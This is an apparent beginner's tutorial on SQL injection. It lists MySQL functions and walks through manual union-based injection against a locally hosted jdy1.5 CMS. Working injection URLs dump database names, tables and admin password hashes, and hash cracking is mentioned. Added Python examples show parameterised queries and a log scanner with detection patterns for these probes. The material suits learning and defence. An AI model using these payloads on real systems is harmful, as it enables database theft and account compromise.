Penetration Testing Beginner Series: SQL Injection

(This article is just an ordinary learning record. If there are any mistakes, please point them out. If it helps you, I am also very happy.)


I. Introduction

1. Essence of a SQL injection vulnerability: the back-end code treats user-supplied data as code and executes it, violating the principle of separating code from data

2. Causes of injection: the parameters passed from the front end can be controlled by the user, and the back end passes them on without filtering (or with imperfect filtering), which results in SQL injection

3. A SQL injection vulnerability requires two conditions:

  • The user can control the input content
  • The web application passes the user input to the database for execution

4. Harm: data leakage, dumping the database, tampering with the site, destroying the database, planting a backdoor, getting a shell, etc.

5. Classification:

  • By request method: GET, POST, cookie
  • By parameter form: numeric, string, search
  • By feedback type: error-based, union-based, boolean-based (page content or status), time-based (delay)
  • By database type: Access, MySQL, MSSQL, Oracle, NoSQL, etc.
  • By technique used: inline, stacked queries, time-based, boolean-based, error-based, union-based
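The code/data separation point from item 1, shown as an added example (not code from the original post): an in-memory SQLite table stands in for the page's `users` table, the first lookup splices the input into the SQL text the way the `id='$id'` example later in this post does, and the second binds it as a parameter. The probe string is the page's own `-1' or '1'='1` test payload; the table contents are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the page's `users` table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, "admin"), (2, "alice"), (3, "bob")])
    return con

def lookup_vulnerable(con, user_id):
    # Mirrors `SELECT * FROM users WHERE id='$id'`: the input is spliced into
    # the SQL text, so a quote inside it becomes part of the statement.
    sql = "SELECT * FROM users WHERE id='%s'" % user_id
    return con.execute(sql).fetchall()

def lookup_safe(con, user_id):
    # Placeholder binding keeps the input as data: the driver never lets it
    # change the statement structure, whatever characters it contains.
    return con.execute("SELECT * FROM users WHERE id=?", (user_id,)).fetchall()

def demo():
    # Row counts for a normal id and for the page's probe, under both lookups.
    con = make_db()
    normal = "2"
    probe = "-1' or '1'='1"
    return {
        "vuln_normal": len(lookup_vulnerable(con, normal)),
        "vuln_probe": len(lookup_vulnerable(con, probe)),
        "safe_normal": len(lookup_safe(con, normal)),
        "safe_probe": len(lookup_safe(con, probe)),
    }

if __name__ == "__main__":
    print(demo())
```

With the spliced query the probe returns every row even though no such id exists; with the bound parameter it returns nothing, which is exactly the "two conditions" from item 3 being broken on the second one.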


II. Common database functions and system variables (MySQL)

1. @@tmpdir   temporary directory

2. @@datadir  data storage location

3. @@basedir  installation directory of the database service

4. @@version  version number

5. @@hostname  host name of the database server (for the user name, use user())

6. ascii(str)   returns the ASCII value of the leftmost character of str

7. user()   returns the current user name

8. version()   returns the current version number

9. database()   returns the current database

10. concat()   joins several strings into one string

11. group_concat()   joins the values belonging to each GROUP BY group and returns the result as one string

12. concat_ws()   joins several strings into one string, with a separator as the first argument

13. String extraction:

  • substr()  Oracle, MySQL, MSSQL
  • substring()  MySQL, MSSQL
  • mid()  MySQL
  • Note: all three take three parameters: the string to extract from, the starting index, and the length to take
  • left(pa1, pa2)  pa1 is the string; takes pa2 characters from the left
  • right(pa1, pa2)  pa1 is the string; takes pa2 characters from the right

14. sleep()   sleeps for the given number of seconds

15. ord()   returns the character code of a character (ASCII value)

16. Conditionals:

  • if(condition, value or statement returned when the condition is true, value or statement returned when the condition is false)
  • case when condition then value or statement returned when true else value or statement returned when false end
    • e.g. select 1,case when 1=1 then 'hello' else 'goodbye' end,3 --+

17. length()   calculates the length of a string

18. Union queries:

  • select * from users where id=1 union select "a","b","c";
  • select * from users where id=0.01 union select 1,2,user(),4,@@databases;


III. MySQL: one database, one table, three fields

1. One database: information_schema, the system database that aggregates the names of all other databases, their tables and their fields

2. One table: the columns table, which stores (database name, table name, field name) rows

3. Three fields:

  • table_schema  the field storing the names of the other databases
  • table_name  the field storing the table names in the other databases
  • column_name  the field storing the field names in the other databases
select table_schema, table_name, column_name from information_schema.columns;  query the data for the three fields
select table_schema, table_name, column_name from information_schema.columns where table_schema="dvwa";  conditional query
select table_schema, table_name, column_name from information_schema.columns where table_schema=0x64767761;  "dvwa" converted to hexadecimal

Note: the MySQL version must be > 5.0


IV. Manual injection

  • Tested against a locally deployed jdy1.5 website

1. Detecting the injection point: i.e. a place where SQL injection may exist. Find parameters with names like id (id/uid/key, typeid/sid, etc.) and append test payloads after them, such as ' or ' and 1=1# or ' and 1=2-- or -1' or '1'='1' and so on

  • Whether a single quote is needed is determined by how the back end concatenates the SQL statement, for example (%23 is the URL encoding of #):
SELECT * FROM users WHERE id='$id' LIMIT 0,1
    front-end test: id=1' and 1=1%23
SELECT * FROM users WHERE id=$id LIMIT 0,1
    front-end test: id=1 and 1=1%23
  • If the injected code is executed successfully (judged from the page output and error messages), there is a SQL injection point here
  • Next, determine the injection technique: choose it according to how the page echoes results
  • Determine how many columns the back-end query selects and which of them are displayed on the front end
http://127.0.0.1/jdy1.5/typeid.php?typeid=1 order by 6#
  • Change the number and judge from the page output how many columns the back-end query selects; here it is 5 columns (information gathering)
http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,2,3,4,5%23
  • The page output shows that position 2 is echoed to the front end, so the 2 can be replaced with a SQL statement

2. Collecting back-end database information

http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,user(),3,4,5%23  view the current user
http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,database(),3,4,5%23  view the current database
http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct table_schema) from information_schema.columns),3,4,5%23
    distinct  removes duplicates
    group_concat  groups and concatenates
    spaces can be replaced with +

3. Getting the tables in the current database

http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct table_name) from information_schema.columns where table_schema=database()),3,4,5%23

4. Getting the column names of a given table in the current database

http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name='jdy_admin'),3,4,5%23
http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select group_concat(distinct column_name) from information_schema.columns where table_schema=database() and table_name=0x6a64795f61646d696e),3,4,5%23
  • Usually you need to find the admin or other sensitive tables; 0x6a6479636d73 is the hexadecimal encoding of 'jdycms'

5. Getting the column data

select concat(username,0x7e,password) from jdy_admin limit 0,1;
http://127.0.0.1/jdy1.5/typeid.php?typeid=100000000 union select 1,(select concat(username,0x7e,password) from jdy_admin limit 0,1),3,4,5%23

6. Decrypting the hashes: use cmd5, pmd5, etc.

7. Finding the admin login page: by guessing, directory scanning, information gathering, etc.
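The request sequence in steps 1 to 5 leaves a recognisable trail in the web server's access log. As an added defender-side example (not code from the original post), this scanner decodes each request's query string the way the post describes (%23 for #, + for a space) and flags the union-based enumeration pattern; the log lines are constructed in combined log format and the field names of the findings are my own.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the probes this walkthrough uses (order by N, union
# select, information_schema lookups, @@ variables, a trailing %23 comment).
# Dict order fixes the order in which hits are reported.
INDICATORS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select":   re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum":    re.compile(r"\binformation_schema\."),
    "sys_variable":   re.compile(r"@@\w+"),
    "comment_trunc":  re.compile(r"(?:#|--)$"),
}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize_query(url):
    # Undo the encodings the page relies on: %23 -> '#', '+' or %20 -> ' ',
    # then case-fold and collapse whitespace so the patterns match reliably.
    query = url.partition("?")[2]
    return re.sub(r"\s+", " ", unquote_plus(query)).strip().lower()

def scan(lines):
    # One finding per request whose decoded query string matches an indicator.
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = normalize_query(m.group(1))
        hits = [name for name, rx in INDICATORS.items() if rx.search(q)]
        if hits:
            findings.append({"line": n, "query": q, "hits": hits})
    return findings

# Constructed access-log lines replaying the request sequence from section IV.
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2019:12:00:01 +0800] "GET /jdy1.5/typeid.php?typeid=1 HTTP/1.1" 200 2310',
    '127.0.0.1 - - [10/Oct/2019:12:00:05 +0800] "GET /jdy1.5/typeid.php?typeid=1%20order%20by%206%23 HTTP/1.1" 200 1180',
    '127.0.0.1 - - [10/Oct/2019:12:00:09 +0800] "GET /jdy1.5/typeid.php?typeid=100000000+union+select+1,2,3,4,5%23 HTTP/1.1" 200 2290',
    '127.0.0.1 - - [10/Oct/2019:12:00:14 +0800] "GET /jdy1.5/typeid.php?typeid=100000000+union+select+1,(select+group_concat(distinct+table_schema)+from+information_schema.columns),3,4,5%23 HTTP/1.1" 200 2350',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["line"], f["hits"], f["query"])
```

Decoding before matching is the important step: matching the raw URL would miss the `+`-encoded spaces and the `%23` comment marker that the post itself points out.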


Origin www.cnblogs.com/yankaohaitaiwei/p/11723480.html